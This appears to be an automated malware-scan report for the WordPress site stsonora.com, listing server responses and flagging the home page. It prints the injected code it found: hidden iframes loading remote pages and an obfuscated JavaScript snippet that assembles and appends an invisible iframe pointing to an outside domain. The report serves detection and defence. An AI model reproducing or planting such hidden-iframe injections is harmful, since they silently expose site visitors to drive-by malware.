Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stsonora.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.stsonora.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Sun, 22 Jun 2014 05:15:31 GMT Pragma: no-cache Location: http://stsonora.com/ Server: Microsoft-IIS/8.5 Content-Length: 146 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=l6o8dt7cemv63ck4279g4mt5m5; path=/ Set-Cookie: wfvt_350183620=53a666745b48d; expires=Sun, 22-Jun-2014 05:45:32 GMT; path=/; httponly X-Pingback: http://stsonora.com/xmlrpc.php X-Powered-By: PHP/5.3.26 X-Powered-By: ASP.NET | clean |
http://stsonora.com/ | 200 OK Content-Length: 29535 Content-Type: text/html | malicious |
Page code contains blacklisted domain: gamedev.raconsultants.net ...[32490 bytes skipped]... .resize(function() { $('#main_menu > ul') .supersubs({ minWidth: 12, // minimum width of sub-menus in em units maxWidth: 27, // maximum width of sub-menus in em units extraWidth: 1 // extra width can ensure lines don't sometimes turn over }); }); })(jQuery); </script><iframe src="http://gamedev.raconsultants.net/ok.php" width="1" height="1"></iframe>vw='abi';s='rg';vo='ifr';h='lli';ov='a';p='i';a='r';d='s';e='k';m='c';o='p:/';b='?';zj='b';bi='a.o';hb='me';pa='ng.';c='/';ee='/';mo='z';g='htt';lg='y';w='i';y='fra';x=w.concat(y,hb);te=d.concat(a,m);t=g.concat(o,c,zj,p,h,pa,mo,vw,lg,ov,e,bi,s,ee,b,vo);var bf=document.createElement(x);bf.setAttribute('width','5');bf.setAttribute('height','5');bf.setAttribute('style','display:none');bf.setAttribute(te,t);document.body.appendChild(b ...[412 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://gamedev.raconsultants.net/ok.php This URL is marked by Google as suspicious <iframe src="http://gamedev.raconsultants.net/ok.php" width="1" height="1"> Malicious iFrame found. size: 0x0 src: http://zabiyaka.org/file/ok.php This URL is marked by Google as suspicious <iframe src="http://zabiyaka.org/file/ok.php" width="0" height="0"> | ||
http://stsonora.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://stsonora.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://cdnjs.cloudflare.com/ajax/libs/modernizr/2.6.2/modernizr.min.js?ver=2.6.2 | 200 OK Content-Length: 15414 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/CuteSlider/js/cute.slider.js?ver=1.1.1 | 200 OK Content-Length: 42563 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/CuteSlider/js/cute.transitions.all.js?ver=1.1.1 | 200 OK Content-Length: 16781 Content-Type: application/javascript | clean |
http://cdnjs.cloudflare.com/ajax/libs/respond.js/1.1.0/respond.min.js?ver=1.1.0 | 200 OK Content-Length: 4069 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/google-calendar-events/js/jquery-qtip.js | 200 OK Content-Length: 38428 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/google-calendar-events/js/gce-script.js | 200 OK Content-Length: 1616 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?ver=3.9.1 | 200 OK Content-Length: 17128 Content-Type: application/javascript | clean |
http://stsonora.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=3.9.1 | 200 OK Content-Length: 55455 Content-Type: application/javascript | clean |
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 4289 Content-Type: application/javascript | clean |
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4 | 200 OK Content-Length: 6521 Content-Type: application/javascript | clean |
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js?ver=1.10.4 | 200 OK Content-Length: 11623 Content-Type: application/javascript | clean |
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js?ver=1.10.4 | 200 OK Content-Length: 35806 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stsonora.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Sun, 22 Jun 2014 05:15:33 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.5
Content-Length: 29535
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://stsonora.com/>; rel=shortlink
Set-Cookie: PHPSESSID=ls3k2hltv0koqdepqbce10alj6; path=/
Set-Cookie: wfvt_350183620=53a6667575b1d; expires=Sun, 22-Jun-2014 05:45:33 GMT; path=/; httponly
X-Pingback: http://stsonora.com/xmlrpc.php
X-Powered-By: PHP/5.3.26
X-Powered-By: ASP.NET
...29535 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: stsonora.com
Referer: http://www.google.com/search?q=stsonora.com
Result:
The result is similar to the first query. There are no suspicious redirects found.